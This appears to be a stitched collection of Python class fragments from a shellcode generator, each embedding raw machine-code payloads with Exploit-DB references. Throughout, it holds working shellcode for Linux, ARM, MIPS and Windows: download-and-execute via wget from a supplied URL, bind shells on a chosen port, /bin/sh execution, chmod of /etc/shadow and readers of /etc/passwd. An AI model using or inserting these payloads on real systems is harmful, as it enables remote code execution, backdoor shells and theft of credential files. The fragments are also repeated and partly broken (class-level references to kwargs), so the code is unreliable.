def __init__(self, **kwargs): Shellcode.info["size"] = \ 101 + Shellcode().getsize(kwargs["filename"]) * 2 + Shellcode().getsize([kwargs["url"]]) Shellcode.info["payload"] = [ r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74" r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1" r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31" r"\xc0\x50\xb0\x0f" + kwargs["filename"] + r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31" r"\xc0\x50" + kwargs["filename"] + r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd" r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" + kwargs["url"] + r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68" r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3" r"\x52\x51\x53\x89\xe1\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux/x86 - file reader" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/37285/" ] Shellcode.info["size"] = 19 + Shellcode.getsize(kwargs["file"]) Shellcode.info["rawassembly"] = [ "xor %eax,%eax", "push %eax", "push $0x776f6461", "push $0x68732f63", "push $0x74652f2f", "mov $0xf,%al", "mov %esp,%ebx", "mov $0x1ff,%cx", "int $0x80", "xor %eax,%eax", "inc %eax", "int $0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff" r"\x01\xcd\x80\x31\xc0\x40\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = 28 + Shellcode().getsize(kwargs["file"]) Shellcode.info["payload"] = [ r"\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46" r"\x10\x30\xff\x21\xff\x31\x01\x31\x0f\x37" r"\x01\xdf\x40\x40\x01\x27\x01\xdf" + kwargs["file"] ]
class Payload(Shellcode): Shellcode.info["author"] = "xmgv" Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/36398/", "https://xmgv.wordpress.com/2015/02/19/28/", ] Shellcode.info["size"] = 94 + Shellcode.getsize(kwargs["lport"]) Shellcode.info["rawassembly"] = [ "xor %eax,%eax", "push %eax", "push $0x68732f2f", "push $0x6e69622f", "mov %esp,%ebx", "push %eax", "push %ebx", "mov %esp,%ecx", "mov $0xb,%al", "int $0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53" r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0" r"\x66\x43\x52\x66\x68" + kwargs["lport"] + r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89" r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89" r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1" r"\xcd\x80\x93\x31\xc9\xb1\x02" r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92" r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = 29 + Shellcode().getsize(kwargs["execommand"]) Shellcode.info["payload"] = [ r"\x48\x31\xd2\xe8\x06\x00\x00\x00\x68\x65\x6c" r"\x6c\x6f\x00\x5f\x52\x57\x48\x89\xe6\x48\x31" r"\xc0\x48\x83\xc8\x3b\x0f\x05" + kwargs["execommand"] ]
def __init__(self, **kwargs): Shellcode.info["size"] = 43 + Shellcode().getsize(kwargs["file"]) Shellcode.info["payload"] = [ r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] + r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0" r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80" r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd" r"\x80\x31\xc0\xb0\x01\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = 47 + Shellcode().getsize(kwargs["file"]) Shellcode.info["payload"] = [ r"\x31\xc0\x50\x50\xb0\x17\xcd\x91\xeb\x20" r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" r"\x52\x53\xb0\x3b\x50\xcd\x91\x40\x50\x50" r"\xcd\x91\xe8\xdb\xff\xff\xff" + kwargs["file"] ]
def __init__(self, **kwargs): Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["execommand"]) Shellcode.info["payload"] = [ r"\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68" r"\x68\x2f\x2f\x62\x69\x89\xe3" r"\x50\x66\x68\x2d\x63\x89\xe7\x50" r"\x51\x57\x53\x89\xe7\x50\x57\x53" r"\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff" + kwargs["execommand"] ]
def __init__(self, **kwargs): Shellcode.info["size"] = 82 + Shellcode().getsize(kwargs["file"]) Shellcode.info["payload"] = [ r"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31" r"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89" r"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48" r"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01" r"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff" r"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41" + kwargs["file"] ]
def __init__(self, **kwargs): Shellcode.info["size"] = 93 + Shellcode().getsize(kwargs["lport"]) Shellcode.info["payload"] = [ r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16" r"\x31\xc0\x50\x68\xff\x02" + kwargs["lport"] + r"\x89\xe7\x6a\x02\x50\x50" r"\x6a\x02\x6a\x02\xb0\xe6\xff\xd6\x6a\x10\x57\x50\x31\xc0" r"\xb0\xe8\xff\xd6\x5b\x50\x50\x53\xb0\xe9\xff\xd6\xb0\xea" r"\xff\xd6\x6a\x09\x50\x6a\x3e\x58\xff\xd6\xff\x4f\xd8\x79" r"\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" r"\x50\x53\x89\xe1\x50\x51\x53\xb0\x3b\xff\xd6" ]
def __init__(self, **kwargs): db = [] for x in kwargs["execommand"]: db.append("\\x" + x.encode("hex")) kwargs["execommand"] = "".join(db) Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"]) Shellcode.info["payload"] = [ r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1" r"\x78\x46\x0a\x30\x01\x90" r"\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + kwargs["execommand"] ]
def __init__(self, **kwargs): Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"]) Shellcode.info["payload"] = [ r"\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50" r"\xb0\x61\xcd\x80\x96\x52\x66\x68" + kwargs["lport"] + r"\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd" r"\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56" r"\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea" r"\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75" r"\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" r"\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["file"]) Shellcode.info["payload"] = [ r"\xff\xff\x06\x28\xff\xff" r"\xd0\x04\xff\xff\x05\x28" r"\xb6\x01\x05\x24\x01\x10" r"\xe4\x27\x1f\xf0\x84\x24" r"\xaf\x0f\x02\x24\x0c\x01" r"\x01\x01\xff\xff\x04\x28" r"\xa1\x0f\x02\x24\x0c\x01" r"\x01\x01" + kwargs["file"] ]
def __init__(self, **kwargs): db = [] for x in kwargs["execommand"]: db.append("\\x" + x.encode("hex")) kwargs["execommand"] = "".join(db) Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"]) Shellcode.info["payload"] = [ r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f" r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12" r"\x00\x00\x00" + kwargs["execommand"] + r"\x00\x57\x53\x89\xe1\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"]) Shellcode.info["payload"] = [ r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53" r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0" r"\x66\x43\x52\x66\x68" + kwargs["lport"] + r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89" r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89" r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1" r"\xcd\x80\x93\x31\xc9\xb1\x02" r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92" r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = \ 187 + Shellcode().getsize(kwargs["payload"]) Shellcode.info["payload"] = [ r"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31" r"\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f" r"\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89" r"\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd" r"\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01" r"\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b" r"\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd" + kwargs["payload"] + r"\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6" r"\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75" r"\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c" r"\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7" ]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux/x86 - file reader" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/37297/" ] Shellcode.info["size"] = 43 + Shellcode.getsize(kwargs["file"]) Shellcode.info["rawassembly"] = [ "xor %ecx,%ecx", "xor %eax,%eax", "xor %edx,%edx", "push %ecx", "mov $0x5,%al", "push $0x64777373", "push $0x61702f63", "push $0x74652f2f", "mov %esp,%ebx", "int $0x80", "mov %ebx,%ecx", "mov %eax,%ebx", "mov $0x3,%al", "mov $0xfff,%dx", "inc %dx", "int $0x80", "xor %eax,%eax", "xor %ebx,%ebx", "mov $0x1,%bl", "mov $0x4,%al", "int $0x80", "xor %eax,%eax", "mov $0x1,%al", "int $0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] + r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0" r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80" r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd" r"\x80\x31\xc0\xb0\x01\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "Unkown" Shellcode.info["name"] = "Linux/x86 - exec shellcode" Shellcode.info["size"] = 36 + Shellcode.getsize(kwargs["execommand"]) def __init__(self, **kwargs): db = [] for x in kwargs["execommand"]: db.append("\\x"+x.encode("hex")) kwargs["execommand"] = "".join(db) Shellcode.info["payload"] = [ r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f" r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12" r"\x00\x00\x00" +kwargs["execommand"]+ r"\x00\x57\x53\x89\xe1\xcd\x80" ]
def __init__(self, **kwargs): Shellcode.info["size"] = 19 + Shellcode().getsize(kwargs["file"]) Shellcode.info["payload"] = [ r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff" r"\x01\xcd\x80\x31\xc0\x40\xcd\x80" ]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/39389/" ] Shellcode.info["size"] = \ 101 + Shellcode.getsize(kwargs["filename"])*2 + Shellcode.getsize([kwargs["url"]]) Shellcode.info["rawassembly"] = [ "xor eax,eax", "mov al,0x2", "int 0x80", "xor ebx,ebx", "cmp eax,ebx", "jz 0x47", "xor ecx,ecx", "xor ebx,ebx", "xor eax,eax", "push byte +0x5", "mov ecx,esp", "mov ecx,esp", "mov ebx,esp", "mov al,0xa2", "int 0x80", "xor ecx,ecx", "xor eax,eax", "push eax", "mov al,0xf", "push byte +0x68", "mov ebx,esp", "xor ecx,ecx", "mov cx,0x1ff", "int 0x80", "xor eax,eax", "push eax", "push byte +0x68", "mov ebx,esp", "push eax", "mov edx,esp", "push ebx", "mov ecx,esp", "mov al,0xb", "int 0x80", "xor eax,eax", "inc eax", "int 0x80", "push byte +0xb", "pop eax", "cdq", "push edx", "push dword 0x682f6365", "push dword 0x78652f2f", "push dword 0x6f692e62", "push dword 0x75687469", "push dword 0x672e6d34", "push dword 0x626d3362", "mov ecx,esp", "push edx", "push byte +0x74", "push dword 0x6567772f", "push dword 0x6e69622f", "push dword 0x7273752f", "mov ebx,esp", "push edx", "push ecx", "push ebx", "mov ecx,esp", "int 0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74" r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1" r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31" r"\xc0\x50\xb0\x0f" +kwargs["filename"]+ r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31" r"\xc0\x50" +kwargs["filename"]+ r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd" r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" +kwargs["url"]+ r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68" r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3" r"\x52\x51\x53\x89\xe1\xcd\x80" ]